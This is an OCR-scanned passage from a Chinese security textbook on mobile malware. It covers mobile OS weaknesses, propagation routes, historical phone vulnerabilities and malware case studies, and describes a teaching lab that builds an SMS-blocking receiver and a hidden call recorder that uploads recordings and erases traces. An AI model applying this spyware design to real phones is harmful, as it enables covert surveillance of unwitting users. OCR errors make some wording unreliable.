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用 户 所 制作 的 第 三 方 软件 还 非常 少 ,影响 了 Linux 操作 系统 在 智能 手机 领域 内 的 势力 扩张 。 

Linux 作为 一 个 完全 开放 的 操作 系统 ,使 得 手机 厂商 进入 所 需 的 门槛 较 低 ,目前 在 市 场 
中 共有 13 家 厂商 选择 Linux 作为 其 智能 手机 的 操作 系统 平台 。 与 Symbian 操作 系统 发 展 
情况 比较 相似 的 是 ,在 整个 Linux 阵营 中 ,摩托 罗拉 在 其 中 所 占 的 市 场 份额 超过 了 70%。 
基于 Linux 较 好 的 开放 性 ,让 许多 手机 厂商 获得 了 进入 智能 手机 市 场 的 敲门砖 ,但 也 是 
Linux 的 开放 性 ,使 得 在 这 一 平台 上 所 开发 的 软件 缺少 一 定 的 标准 性 ,导致 了 许多 应 用 软件 
间 的 兼容 性 有 所 降低 ,这 一 点 在 未 来 势必 会 影响 Linux 市 场 份额 的 增长 。 

6. WebOS 系统 

WebOS 的 前 身 正 是 PDA 时 代为 不 少 自称 为 “ 胖 友 ”的 Palm, 曾 经 在 市 场 独霸 天 下 的 
Palm 由 于 不 适应 市 场 , 几 年 间 就 来 去 匆匆 了 。 表 现 较 差 的 网 络 浏览 器 .在 Palm OS 手机 上 
几乎 永远 见 不 到 的 Wi-Fi 和 GPS ,都 使 得 PalmOS 智能 手机 越 来 越 小 众 。 在 “ 胖 友 ”对 Palm 
几乎 绝望 的 时 候 , 智 能 手机 PalmPre 和 其 下 一 代 操 作 系统 WebOS 的 出 现 , 使 Palm 又 重 现 
生机 。 但 是 好 景 不 长 ,尽管 WebOS 在 娱乐 性 以 及 人 机 交互 方面 都 有 不 少 的 进步 ,并 且 有 着 
鲜明 的 特色 ,但 是 随 着 几 款 没有 竞争 力 的 产品 退出 市 场 后 表现 平平 ,最终 被 交易 到 了 惠普 手 
中 ,但 是 在 惠普 手中 并 没有 多 少 起 色 。 惠 普 在 2011 年 表示 ,将 不 再 继续 运营 WebOS 系统 
设备 业务 。 

7. 黑莓 系统 

RIM 黑莓 曾经 非常 风行 ,依靠 全 键盘 的 配置 ,对 邮件 的 管理 .出 色 的 用 户 体验 .安全 性 
等 方面 的 领先 ,是 不 少 用 户 的 首选 。 不 过 如 今 RIM 智能 手机 的 市 场 份额 也 不 断 地 被 竞争 对 
手 苹果 iPhone 和 谷歌 Android 系统 手机 蚕食 。 黑 莓 特色 全 键盘 在 这 个 触摸 屏 当 道 的 时 代 
显得 格格 不 入 ,而 推出 了 全 触 屏 与 键盘 结合 等 尝试 后 ,RIM 依然 没有 摆脱 股价 不 断 下 跌 的 


6.2.2 手机 操作 系统 的 弱点 


移动 终端 操作 系统 具有 很 多 和 普通 计算 机 操作 系统 相似 的 弱点 。 不 过 ,其 最 大 的 弱 
点 还 是 在 于 移动 终端 比 现 有 的 台式 机 更 缺乏 安全 措施 。 人 们 已 经 对 台式 机 的 安全 性 有 
了 一 定 的 了 解 ,而 且 大 部 分 普通 PC 操作 系统 本 身 也 带 有 一 定 的 安全 措施 ,已 经 被 设计 成 
能 抵抗 一 定 程 度 攻击 的 系统 。 因 此 普通 PC 上 的 安全 措施 ,使 它 受 到 安全 威胁 的 可 能 大 
为 减少 。 

移动 终端 操作 系统 就 不 同 了 , 它 的 设计 人 员 从 一 开始 就 没有 太 多 的 空间 来 考虑 操作 
系统 的 安全 问题 ,而且 ,移动 终端 操作 系统 也 没有 像 PC 操作 系统 那样 经 过 严格 的 测试 ， 
甚至 在 国际 通用 的 信息 安全 评估 准则 (ISO 15408) 中 ,都 没有 涉及 移动 终端 操作 系统 的 
安生 

移动 终端 操作 系统 的 弱点 主要 体现 在 以 下 几 个 方面 。 

(1) 不 支持 任意 的 访问 控制 (Discretionary Access Control,DAC) ,也 就 是 说 , 它 不 能 区 
分 一 个 用 户 同 另 一 个 用 户 的 个 人 私密 数据 。 

(2) 不 具备 审计 能 力 。 

(3) 缺少 通过 使 用 身份 标示 符 或 者 身份 认证 进行 重用 控制 的 能 力 。 
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(4) 不 对 数据 完整 性 进行 保护 。 

(5) 即使 部 分 系统 有 密码 保护 ,恶意 用 户 仍然 可 以 使 用 调试 模式 轻易 得 到 他 人 的 密码 ， 
或 者 使 用 类 似 PalmCrypt 这 样 的 简单 工具 得 到 密码 。 

(6) 在 密码 锁定 的 情况 下 ,移动 终端 操作 系统 仍然 允许 安装 新 的 应 用 程序 。 

移动 终端 操作 系统 的 这 些 弱 点 危及 设备 中 的 数据 安全 ,尤其 是 当 用 户 丢失 终端 设备 后 ， 
一 且 被 恶意 用 户 得 到 了 ,他们 就 可 以 毫 无 阻碍 地 查看 设备 中 的 个 人 机 密 数 据 。 如 果 身 边 的 
人 有 机 会 接近 设备 ,他们 就 能 修改 其 中 的 数据 。 而 终端 设备 的 主人 对 其 他 未 授权 用 户 的 查 
看 一 无 所 知 , 即 使 发 现 有 人 改动 了 数据 ,也 没有 任何 证 据 表 明 是 谁 改 动 的 。 也 就 是 说 ,移动 
终端 操作 系统 没有 提供 任何 线索 帮助 发 现 人 侵 和 进行 人 侵 追 踪 。 

移动 终端 设备 相对 于 普通 PC 来 说 ,又 小 又 轻 ,容易 丢失 。 一 旦 丢失 ,这 些 设备 又 缺少 
通过 使 用 身份 标示 符 或 者 身份 认证 进行 使 用 控制 的 能 力 , 任 何 捡 到 该 设备 的 人 都 可 以 看 到 
其 中 的 个 人 信息 。 如 果 其 中 还 包含 与 公司 机 密 主题 相关 的 客户 通讯 录 或 者 电子 邮件 信息 ， 
那么 这 些 数 据 落 人 他 人 之 手 , 就 有 可 能 给 整个 公司 带 来 严重 的 损失 。 

现在 虽然 有 一 些 移动 终端 设备 采用 了 机 密 措施 来 保护 其 中 的 重要 数据 ,但 是 受到 设备 
的 能 量 和 运算 能 力 的 限制 ,加 密 强度 并 不 大 ,非常 容易 被 破解 。 


6.3 移动 终端 恶意 代码 关键 技术 


移动 终端 恶意 代码 是 一 种 以 移动 终端 设备 为 攻击 目标 的 程序 , 它 以 手机 或 PDA 为 感 
染 对 象 , 以 无 线 通信 网 络 和 计算 机 网 络 为 平台 ,通过 发 送 恶 意 短 信 等 形式 ,对 终端 设备 进行 
攻击 ,从 而 造成 设备 状态 异常 。 

随 着 GPRS、3G 技术 的 发 展 ,以 及 手机 硬件 设备 的 迅速 升级 ,手机 趋向 一 台 小 型 计算 
机 ,有 计算 机 上 的 恶意 软件 就 会 有 手机 上 的 恶意 代码 。 当 前 ,手机 恶意 代码 已 经 了 成 为 新 的 有 
意 代码 研究 热点 。 


6.3.1 移动 终端 恶意 代码 传播 途径 


目前 ,移动 终端 恶意 代码 主要 通过 几 种 途径 进行 攻击 : 终端 一 终端 ,终端 一 网 关 一 终 
端 \PC( 计 算 机 ) 一 终端 。 

终端 一 终端 : 手机 直接 感染 手机 ,其 中 间 桥 梁 诸如 蓝牙 ,红外 等 无 线 连接 。 通 过 该 途径 
传播 的 最 著名 的 病毒 实例 就 是 国际 病毒 编写 小 组 “29A? 发 布 的 Cabir 蠕虫 。Cabir 蠕虫 通 
过 手机 的 蓝牙 设备 传播 ,使 染 毒 的 蓝牙 手机 通过 无 线 方式 搜索 并 传染 其 他 蓝牙 手机 。 

终端 一 网 关 一 终端 : 手机 通过 发 送 含 毒 程序 或 数据 给 网 关 ( 如 WAP 服务 器 、 短 信 
等 ) ,网 关 染 毒 后 再 把 恶意 代码 传染 给 其 他 终端 或 者 干扰 其 他 终端 。 典 型 的 例子 是 VBS. 
Timofonica 病毒 . 它 的 破坏 方式 是 感染 短信 平台 后 ,通过 短信 平台 向 用 户 发 送 垃圾 信息 或 
和 

PC( 计 算 机 ) 一 终端 : 恶意 代码 先 寄宿 在 普通 计算 机 上 , 当 移 动 终 端 连接 染 毒 计算 机 
时 ,恶意 代码 再 传染 给 移动 终端 。 
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6.3.2 移动 终端 恶意 代码 攻击 方式 


从 攻击 对 象 来 分 , 现 有 移动 终端 恶意 代码 也 可 以 划分 为 如 下 类 型 。 

(1) 短信 攻击 : 主要 是 以 “恶意 短信 ”的 方式 发 起 攻击 。 

(2) 直接 攻击 手机 : 直接 攻击 相 邻 手机 ,Cabir 蠕虫 就 是 这 种 恶意 代码 。 

(3) 攻击 网 关 : 控制 WAP 或 短信 平台 .并 通过 网 关 向 手机 发 送 垃 圾 信息 ,干扰 手机 用 
户 , 甚 至 导致 网 络 运行 瘫痪 。 

(4) 攻击 漏洞 : 攻击 字符 格式 漏洞 智能 手机 操作 系统 漏洞 ,应 用 程序 运行 环境 漏洞 和 
应 用 程序 漏洞 。 

(5) 木马 型 恶意 代码 : 利用 用 户 的 疏忽 ,以 合法 身份 侵入 移动 终端 ,并 伺机 窃取 资料 的 
恶意 代码 。 例 如 ,Skulls 恶意 代码 是 典型 的 特洛伊 木马 。 


6.3.3 移动 终端 恶意 代码 的 生存 环境 


在 手机 和 PDA 流行 的 初期 ,虽然 也 在 不 少 移动 终端 设备 上 发 现 了 安全 问题 ,但 真正 意 
义 上 的 恶意 代码 却 非常 罕见 ,这 并 不 是 因为 没有 人 愿意 写 ,而 是 存在 着 不 少 技术 困难 。 早 期 
的 手机 环境 的 弱点 如 下 。 

1. 系统 相对 封闭 

移动 终端 操作 系统 是 专用 操作 系统 ,不 对 普通 用 户 开 放 ( 不 像 计 算 机 操作 系统 ,容易 学 
习 、 调 试 和 程序 编写 ) ,而 且 它 所 使 用 的 芯片 等 硬件 也 都 是 专用 的 ,平时 很 难 接触 到 。 

2. 创作 空间 狭窄 

移动 终端 设备 中 可 以 “ 写 ” 的 地 方太 少 。 例 如 ,在 初期 的 手机 设备 中 ,用 户 是 不 可 以 向 手 
机 里 面 写 数据 的 ,唯一 可 以 保存 数据 的 只 有 SIM 卡 。 这 么 一 点 容量 想 要 保存 一 个 可 以 执行 
的 程序 非常 困难 ,况且 保存 的 数据 还 要 绕 过 SIM 卡 的 格式 。 

3. 数据 格式 单调 

以 初期 的 手机 设备 为 例 , 这 些 设备 接收 的 数据 基本 上 都 是 文本 格式 数据 。 文 本 格式 是 
计算 机 系统 中 最 难 附带 恶意 代码 的 文件 格式 。 同 理 , 在 移动 终端 中 ,恶意 代码 也 很 难 附加 在 
文本 内 容 上 进行 传播 。 

但 是 , 随 着 时 代 的 发 展 ,新 的 恶意 代码 、 蠕 虫 的 威胁 会 不 断 出 现 ,这 就 有 可 能 影响 到 众多 
手持 设备 ,日 益 普及 的 移动 数据 业务 成 为 这 些 恶意 代码 滋生 草 延 的 温床 。 在 今天 越 来 越 多 
的 谈论 手机 短信 、 手 机 邮件 、 手 机 铃声 及 图 片 的 时 候 , 随 之 而 来 的 是 人 们 将 会 看 到 一 些 应 用 
程序 及 插件 也 随 之 出 现 。 这 些 外 来 程序 使 移动 终端 设备 像 计 算 机 一 样 面临 恶意 代码 的 威 
胁 , 一 些 恶 意 代码 可 以 利用 手机 芯片 程序 的 缺陷 ,对 手机 操作 系统 进行 攻击 。 

特别 是 随 着 移动 终端 行业 的 快速 发 展 ,移动 终端 不 多 见 的 局 面 已 经 开始 发 生变 化 ,这 主 
要 在 于 在 新 设备 的 设计 制造 过 程 中 引进 了 一 些 新 技术 。 特 别 是 由 于 以 下 原因 ,为 移动 终端 
恶意 代码 的 产生 、 保 存 和 传播 都 创造 了 条 件 。 

(1) 类 Java 程序 的 应 用 。 类 Java 程序 大 量 运用 于 移动 终端 设备 ,使 得 编写 用 于 移动 终端 
上 的 程序 越 来 越 容 易 ,一 个 普通 的 Java 程序 员 甚 至 都 可 以 编写 出 能 传播 的 恶意 代码 程序 。 

(2) 操作 系统 相对 稳定 。 基 于 Android、iOS、WPhone 和 Black Berry 的 操作 系统 的 终端 设 
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备 不 断 扩 大 ,同时 设备 使 用 的 芯片 (如 Intel 的 Strong ARMD 等 硬件 也 不 断 固定 下 来 ,使 它们 有 
了 比较 标准 的 操作 系统 ,并 且 , 这 些 操 作 系统 厂商 甚至 连 芯 片 都 对 用 户 开放 API, 并 且 鼓励 在 
其 上 做 开发 工作 ,这 样 在 方便 的 同时 ,也 为 恶意 代码 编写 者 提供 了 便利 ,破坏 者 只 需 查 阅 芯 片 
厂商 或 者 操作 系统 厂商 提供 的 手册 就 可 以 编写 出 运行 于 移动 终端 上 的 恶意 代码 。 

(3) 容量 不 断 扩大 。 移 动 终端 设备 的 容量 不 断 扩大 , 既 增 加 了 其 功能 ,也 使 得 恶意 代码 
有 了 藏身 之 地 。 例 如 ,新 型 的 智能 手机 都 有 比较 大 的 容量 ,甚至 能 外 接 CF 卡 。 

(4) 数据 格式 多 媒体 化 。 移 动 终端 直接 应 用 、 传 输 的 内 容 也 复杂 了 很 多 ,从 以 前 只 有 文 
本 发 展 到 现在 支持 二 进 制 格式 文件 ,因此 恶意 代码 就 可 以 附加 在 这 些 文件 中 进行 传播 。 


6.3.4 移动 终端 设备 的 漏洞 


除了 操作 系统 的 漏洞 外 ,移动 终端 设备 本 身 的 漏洞 也 是 编制 恶意 代码 的 核心 技术 。 目 
前 为 止 ,曾经 被 恶意 代码 利用 的 漏洞 如 下 。 

1. PDU 格式 漏洞 

2002 年 1 月 ,荷兰 安全 公司 ITSX 的 研究 人 员 发 现 ,诺基亚 的 一 些 流行 型 号 的 手机 的 操 
作 系 统 由 于 没有 对 短信 的 PDU 格式 做 例外 处 理 ,存在 一 个 Bug。 黑 客 可 以 利用 这 个 安全 漏 
洞 向 手机 发 送 一 条 160 个 字符 以 下 长 度 的 畸形 电子 文本 短信 息 使 操作 系统 崩溃 。 该 漏洞 主 
要 影响 诺基亚 3310、3330 和 6210 型 手机 。 

2. 特殊 字符 漏洞 

由 于 手机 使 用 范围 逐渐 扩大 ,中 国安 全 人 士 对 手机 、 无 线 网 络 的 安全 也 产生 了 兴趣 。 
2001 年 年 底 , 中 国安 全 组 织 Xfocus 的 研究 人 员 发 现 西门 子 35 系列 手机 在 处 理 一 些 特殊 字 
符 时 存在 漏洞 ,将 直接 导致 手机 关机 。 

3. vCard 漏洞 

vCard 格式 是 一 种 全 球 性 的 MIME 标准 ,最 早 由 Lotus 和 Netscape 提出 。 该 格式 实现 
了 通过 电子 邮件 或 者 手机 来 交换 名 片 的 功能 。 诺 基 亚 的 6610、6210、6310 和 8310 等 系列 手 
机 都 支持 vCard, 但 是 其 6210 手机 被 证 实在 处 理 vCard 上 存在 格式 化 字符 串 漏洞 。 攻 击 者 
如 果 发 送 包含 格式 字符 串 的 vCard 恶意 信息 给 手机 设备 ,可 导致 SMS 服务 崩溃 ,使 手机 被 
锁 或 重启 动 。 

4. Siemens 的 “ %String” 漏 洞 

2003 年 3 月 ,西门 子 35 和 45 系列 手机 在 处 理 短信 时 过 到 问题 。 当 接收 到 “% String” 
形式 的 短信 时 ,如 “%English” 西 门 子 手机 系统 会 以 为 是 要 更 改 操作 系统 语言 为 英文 ,从 而 
导致 在 查看 该 类 短信 时 死机 ,利用 这 一 点 很 容易 使 西门 子 这 类 手机 遭受 拒绝 服务 攻击 。 

5. Android 浏览 器 漏洞 

在 Android 2. 3 版 本 之 前 ,Android 浏览 器 在 下 载 payload. html 等 文件 时 不 会 告知 用 
户 , 而 是 自动 下 载 存 储 至 /sdcard/download。 使 用 JavaScript 让 这 个 payload 文件 自动 打 
开 , 使 浏览 器 显示 本 地 文件 。 用 户 在 这 种 本 地 环境 下 打开 一 个 HTML 文件 ,Android 浏览 
器 会 在 不 告知 用 户 的 情况 下 自动 运行 JavaScript。 而 在 这 种 本 地 环境 下 ,JavaScript 就 能 够 
读 取 文件 内 容 和 其 他 数据 。 
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该 缺陷 已 经 被 安全 网 站 海 瑟 安 全 (Heise Security) 独 立 证 实 , 所 以 要 警惕 可 疑 网 站 、 电 
子 邮 件 中 的 HTML 链接 或 Android 通知 栏 中 突然 弹出 的 下 载 。 在 手机 升级 到 Android 2.3 系 
统 前 ,用 户 必须 小 心 。 


6.4 Android 恶意 功能 开发 实验 


本 节 主 要 介绍 Android 系统 下 开发 恶意 功能 的 小 实验 。 通 过 该 实验 ,可 以 使 读者 了 解 
手机 恶意 代码 的 一 些 常 用 方法 ,并 且 熟 悉 Android 模拟 器 的 应 用 以 及 Android 下 的 Java 编 
程 , 为 本 章 的 综合 实验 打 好 基础 。 

本 部 分 使 用 的 软件 环境 如 下 。 

(1) 操作 系统 环境 : Windows 7。 

(2) 开发 工具 : Eclipse SDK 3.7.2。 

(3) 开发 环境 : Android Development Toolkit 16. 0. 1。 

(4) 测试 环境 : Android 模拟 器 4. 0. 3 。 

本 节 主 要 完成 两 个 功能 的 测试 : 短信 拦截 和 电话 监听 。 这 两 个 功能 都 通过 Java 代码 


6.4.1 Android 短信 拦截 


Android 采用 广播 的 方式 接收 短信 ,本 节 的 程序 采用 拦截 广播 的 方式 来 实现 短信 拦截 。 
在 本 代码 中 ,开启 一 个 服务 来 监听 短信 的 广播 ,并 且 该 服务 拥有 最 高 优先 级 ,这 样 该 恶意 服 
务 将 最 早 获 得 短信 的 广播 。 在 拦截 到 短信 后 ,程序 忽略 由 10086 发 送 的 短信 ,不 让 广播 继续 
传播 下 去 ,导致 正常 的 短信 接收 应 用 无 法 获取 10086 短信 的 通知 。 

广播 有 两 种 不 同 的 类 型 : 普通 广播 (Normal Broadcasts) 和 有 序 广播 (Ordered 
Broadcasts) 。 普 通 广播 是 完全 异步 的 ,可 以 被 所 有 的 接收 者 接收 到 ,并 且 接 收 者 无 法 终止 
广播 的 传播 。 然 而 有 序 广播 是 按照 接收 者 声明 的 优先 级 别 ,被 接收 者 依次 接收 到 。 优 先 级 
别 声明 在 intent-filter 元 素 的 android: priority 属性 中 , 数 越 大 优先 级 别 越 高 , 取 值 范围 为 
一 1000 一 1000。 有 序 广播 的 接收 者 可 以 终止 广播 Intent 的 传播 ,广播 Intent 的 传播 一 旦 终 
止 , 后 面 的 接收 者 就 无 法 接收 到 广播 。 在 实现 的 代码 中 Context. sendBroadcast() 发 送 的 是 
普通 广播 ,所 有 订阅 者 都 有 机 会 获得 并 进行 处 理 。Context. sendOrderedBroadcast() 发 送 的 
是 有 序 广播 ,系统 会 根据 接收 者 声明 的 优先 级 别 按 顺序 逐个 执行 接收 者 。 

本 代码 位 置 : 本 书 配套 素材 目录 :\ in-class\ch-8\smsReceiver。 详 细 的 使 用 方法 如 下 。 

1. 安装 恶意 代码 程序 前 的 正常 情况 

在 模拟 器 环境 下 ,模拟 10086 号 码 从 发 送 台 发 送 短信 ,接收 端 能 够 正常 接收 到 短信 , 没 
有 被 拦截 (图 6-4) 。 

2. 运行 本 代码 后 

模拟 10086 从 发 送 平台 发 送 短信 , 收 不 到 任何 从 10086 发 送 的 短信 (图 6-5)。 尝 试用 其 
他 号 码 如 654321 发 送 , 则 可 以 接收 到 (图 6-6)。 
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区 problems @ Javadoc 区 Dedaraton | Console 2D togcat | Debug | Devices 


Telephony Actions 

Incoming number 10086 
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回 SMS 

Message: test before installing the smsReceiver 
test before installing the 
smsReceiver 

9 Up 3 
(a) 模拟 10086 发 短信 (b) 正常 接收 


图 6-4 正常 情况 下 短信 发 送 一 接收 
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6-5 ”模拟 10086 发 的 短信 被 拦截 
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(a) 模拟 654321 发 短信 (b) 正常 接收 
图 6-6 模拟 654321 发 送 一 接收 
6.4.2 Android 电话 监听 


本 节 的 代码 通过 一 个 BroadcastReceiver 广播 接收 者 监听 手机 启动 状态 ,实现 开机 启 
动 。 因 为 是 电话 监听 器 ,不 能 让 用 户 察 觉 ,所 以 不 能 有 软件 界面 ,主要 实现 的 功能 有 对 所 有 
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语音 通话 进行 录制 并 上 传 到 网 上 。 

Android 中 的 服务 类 似 于 Windows 中 的 服务 ,服务 一 般 没有 用 户 操作 界面 , 它 运行 于 
系统 中 不 容易 被 用 户 发 觉 ,可 以 使 用 它 开发 如 监控 之 类 的 程序 。 

本 代码 位 置 : 本 书 配套 素材 目录 :\ in-class\ch-8\PhoneListener。 详 细 的 使 用 方法 丸 
到 《图 Br725 


Telephony Actions 
Incoming number 5554 


加 Voice 
SMS 


6-7 ”Android 电话 监听 


在 Incoming number 后 面 输入 5554, 然 后 单 击 下 面 的 call 按钮 就 可 以 呼叫 了 ,当然 也 

可 以 另外 再 开 一 个 模拟 器 对 5554 进行 呼叫 。 

通话 结束 后 , 转 到 File Explorer 平台 上 查看 sdcard 中 是 否 有 想 要 的 录音 文件 ,有 就 代 

表 监 听 成 功 。 接 下 来 只 要 把 这 样 一 个 音频 文件 上 传 到 网 络 上 的 指定 位 置 ,然后 删除 sdcard 
上 的 音频 文件 (目的 是 隐藏 踪迹 ,防止 被 发 现 )。 这 样 就 实现 真正 的 监听 了 。 


6.5 移动 终端 恶意 代码 实例 


在 智能 手机 平台 上 发 挥 作用 的 恶意 代码 越 来 越 多 ,有 些 影响 非常 大 。 在 此 ,给 出 一 些 具 
有 代表 性 的 手机 平台 恶意 代码 。 

1. Cabir 系列 病毒 

Cabir 是 一 个 使 用 蓝牙 传播 的 蠕虫 ,运行 于 支持 60 系列 平台 的 Symbian 手机 。 它 通过 
蓝牙 连接 复制 ,作为 包含 蠕虫 的 caribe. sis 文件 到 达 手 机 收 信箱 。 当 用 户 点 击 caribe. sis 并 
选择 安装 caribe. sis 文件 时 ,蠕虫 激活 并 开始 通过 蓝牙 寻找 新 的 手机 进行 感 当 Cabir 蠕 
虫 发 现 另 一 个 蓝牙 手机 时 , 它 将 开始 向 其 发 送 感染 SIS 文件 ,并 锁定 这 个 手机 ,以 至 于 即使 
目标 离开 范围 时 它 也 不 会 寻找 其 他 手机 。Cabir 蠕虫 只 能 到 达 传 播 支持 蓝牙 且 处 于 可 发 现 
模式 的 手机 。 

将 手机 设 定 为 不 可 发 现 (隐藏 ) 蓝 牙 模 式 会 保护 手机 不 受 Cabir 蠕虫 侵害 。 但 是 一 旦 手 
机 感染 ,即使 用 户 尝试 从 系统 设置 使 蓝牙 不 可 用 ,病毒 也 会 试图 感染 其 他 系统 。 
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2. CopyCat 病毒 

CopyCat 病毒 通过 5 个 漏洞 传播 ,这 些 安全 漏洞 主要 存在 于 Android 5. 0 或 更 早 版 本 
的 系统 中 ,这 些 漏洞 已 被 发 现 和 修复 。 但 是 如 果 Android 用 户 在 第 三 方 应 用 市 场 下 载 应 用 ， 
它们 仍然 会 受到 攻击 。CopyCat 的 受害 者 数量 在 2016 年 4 一 5 月 期 间 达 到 顶峰 ,也 就 是 惊 
人 的 1400 万 个 。 

CopyCat 正如 其 名 一 样 ,是 通过 假冒 其 他 流行 应 用 来 欺骗 用 户 的 。 一 旦 用 户 下 载 了 这 
种 假冒 的 恶意 应 用 软件 , 它 就 会 收集 受 感染 设备 的 数据 ,下 载 ROOT 工具 来 ROOT 受 感染 
的 设备 ,从 而 切断 其 安全 系统 。 

然后 ,CopyCat 就 可 以 下 载 各 种 虚假 应 用 ,支持 受 感染 设备 的 应 用 启动 程序 Zygote。 一 旦 
它 控制 住 Zygote, 它 就 能 知道 用 户 下 载 过 哪些 新 的 应 用 程序 以 及 打开 的 每 一 款 应 用 程序 。 

CopyCat 可 以 用 它 自己 的 推荐 者 ID(Referrer ID) 来 蔡 换 受 感染 设备 上 的 每 一 款 应 用 
程序 的 推荐 者 ID, 这 样 在 应 用 程序 上 弹出 的 每 一 个 广告 都 会 为 黑客 创造 收益 ,而 不 是 为 应 
用 开发 者 创造 广告 收益 。 每 隔 一 段 时 间 ,CopyCat 还 会 发 布 自己 的 广告 来 增加 收入 。 

Check Point 估计 ,有 近 490 万 个 虚假 应 用 被 安装 到 受 感 染 的 设备 上 ,它们 能 够 显示 1 
亿 条 广告 。 仅 仅 两 个 月 ,CopyCat 就 可 以 为 黑客 赚 到 了 150 万 美元 的 广告 收入 。 

3. Judy 恶意 软件 

Judy 是 一 款 恶意 广告 点 击 软件 ,于 2017 年 被 发 现 。 据 称 超过 40 个 Google Play 商店 
应 用 被 捆绑 了 该 恶意 代码 ,高峰 时 期 感染 3600 万 台 安 卓 设 备 , 而 且 躲 过 Google Play 的 审 
核 长 达 一 年 之 久 , 因 此 ,影响 力 非 常 大 。 

Judy 是 韩国 手 游 中 的 人 物 , 其 定位 偏向 女性 化 设计 ,大 多 为 化 妆 、 换 装 类 ,敏捷 、 益 智 
类 ,相关 主题 系列 共有 超过 40 款 应 用 ,拥有 大 量 用 户 。 这 些 被 感染 的 应 用 能 将 被 感染 设备 
的 信息 发 送 到 目标 网 页 ,从 而 在 后 台 进 行 广告 点 击 操作 ,为 攻击 者 创造 不 正当 收入 。 而 除了 
Judy 系列 手 游 外 ,该 恶意 代码 也 被 发 现存 在 于 其 他 几 个 应 用 程序 中 。 

经 过 研究 发 现 ,Judy 是 在 用 户 下 载 APP 至 手机 并 安装 后 ,与 传送 恶意 程序 的 服务 器 连 
接 , 借 此 成 功 躲 过 Google Play 的 安全 审查 。 该 恶意 软件 成 功 运行 后 ,就 会 将 感染 设备 的 信 
息 发 送 到 目标 页 面 ,并 进行 广告 点 击 操作 ,产生 大 量 非法 流量 ,为 攻击 者 创造 不 正当 收入 。 

4.“X 卧底 ”系列 木马 


在 2011 年 6 月 初 闹 得 沸沸扬扬 的 “X 卧底 ”是 一 款 窃听 软件 ,本 质 上 属于 黑客 间谍 软 
件 。“X 卧底 ?安装 后 不 会 启动 任何 图 标 , 也 不 会 给 用 户 任何 提示 ,一切 监听 行为 都 在 后 台 
动 完 成 ,用 户 根本 无 法 感知 。 该 软件 通过 以 下 方式 窃取 隐私 。 

(1) 当 通话 时 ,木马 会 自动 监听 用 户 手机 通话 并 自动 保存 录音 ,同时 读 取 用 户 的 通话 记 
录 、 短 信 等 内 容 。 

(2) 通话 完毕 后 ,木马 启动 上 传 程序 ,将 通话 录音 等 用 户 隐私 信息 联网 上 传 至 不 法 分 子 
搭建 的 服务 器 。 

(3) 除 偷窃 隐私 外 ,Android 的 间谍 木马 还 包含 隐蔽 的 吸 费 代码 ,会 在 后 台 私 自发 送 扣 
费 短信 ,并 自动 删除 发 送 记 录 和 运营 商 回 执 短信 。 

5.“ 和 白 卡 吸 费 魔 " 木 马 

随 着 Android 水 货 手 机 的 日 益 走 俏 , 不 法 分 子 也 从 中 嗅 到 了 商业 利益 , 正 将 目光 慢 慢 转 
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移 到 水 货 手 机 上 。2011 年 6 月 .360 安全 中 心 接 到 了 部 分 用 户 反 馈 , 新 买 的 Android 手机 没 
用 几 天 就 少 了 几 十 元 的 话费 ,在 安装 安全 软件 后 ,该 软件 过 一 段 就 会 自动 消失 。 

针对 用 户 出 现 的 问题 ,360 安全 专家 进行 分 析 后 得 知 ,这 些 用 户 的 手机 全 部 为 近期 购买 
的 新 手机 , 且 全 部 为 不 法 商家 用 测试 SIM 卡 刷 和 人 带 木 马 ROM 的 “ 白 卡 机 ”, 其 内 置 了 一 组 
恶性 木马 ,分 工 合作 ,分 别 负责 印 载 安全 软件 . 盗 取 用 户 隐私 以 及 疯狂 恶意 扣 费 ,将 其 命名 为 
“ 白 卡 吸 费 魔 ”。 

“ 白 卡 吸 费 魔 * 系 列 木马 的 主要 危害 如 下 。 

(1) 使 用 特殊 方式 刷 入 手机 ,用 户 无 法 删除 ,长 期 驻 留 后 台 消耗 内 存 。 

(2) 利用 系统 漏洞 非法 获取 root 权限 ,使 手机 沦 为 “肉鸡 ”。 

(3) 恶意 删除 用 户 手机 中 的 安全 软件 。 

(4) 回 传 手机 中 包括 SIM 卡 信息 、 网 络 信息 .电话 号 码 在 内 的 多 种 隐私 信息 。 

(5) 后 台 私 自发 送 大量 SP 吸 费 短信 并 删除 发 送 记 录 ,造成 用 户 高 额 话 费 损失 。 

(6) 私自 在 后 台 频 繁 联网 回 传 用 户 隐私 以 及 接收 服务 器 指令 ,消耗 大 量 网 络 流量 。 

6. VBS. Timofonica 


移动 终端 恶意 代码 的 初次 登场 是 在 2000 年 6 月 , 它 就 是 著名 的 VBS. Timofonica。 这 
是 第 一 个 攻击 手机 的 病毒 。 该 病毒 通过 西班牙 的 运营 商 Telefonica 的 移动 系统 向 该 系统 内 
任意 发 送 骂 人 的 短 消 息 , 这 种 攻击 模式 类 似 于 邮件 炸弹 , 它 通 过 短信 服务 运营 商 提供 的 路 由 
可 以 向 任何 人 发 送 大 量 垃圾 信息 或 者 广告 ,在 大 众 眼 里 ,这 种 短信 炸弹 充其量 也 只 能 算是 恶 
作 剧 而 已 。 可 以 看 出 该 病毒 并 非 真 正 意义 上 的 移动 终端 恶意 代码 ,因为 它 只 是 寄宿 在 普通 
的 计算 机 系统 中 。 

7. 知 钱 贪 禁 鬼 (Commwarrior) 

Commwarrior 病毒 也 就 是 彩信 病毒 。 也 许 此 病毒 对 广大 智能 用 户 来 说 并 不 陌生 ,此 病 
毒 是 名 副 其 实 的 和 天 钱 机 器 。 感 染 上 它 以 后 , 它 会 每 隔 几 秒 钟 就 偷偷 地 向 用 户 通讯 录 中 的 号 
码 发 送 彩信 (不 管 是 移动 ,联通 还 是 小 灵通 )。 彩 信 的 费用 和 发 彩信 的 频率 可 以 造成 个 人 的 
直接 资费 损失 。 

8. Skulls 恶意 代码 

Skulls 是 一 个 恶意 SIS 文件 木马 ,用 无 法 使 用 的 版 本 替换 系统 应 用 程序 ,以 致 除 电话 功 
能 外 的 所 有 功能 都 无 法 使 用 。Skulls 安装 的 应 用 程序 文件 是 从 手机 ROM 解压 的 正常 
Symbian OS 文件 。 但 是 由 于 Symbian OS 的 特征 ,将 它们 复制 到 手机 C 盘 中 正确 的 位 置 ， 
会 导致 关键 的 系统 应 用 程序 无 法 使 用 。 

如 果 安 装 Skulls, 会 导致 所 有 应 用 程序 图 标 都 被 替换 为 散人 能 和 十 字 骨 头 的 图 片 ,而 且 图 
标 与 实际 程序 完全 不 相关 ,因此 手机 系统 应 用 程序 都 将 无 法 启动 。 这 基本 意味 着 如 果 安 装 
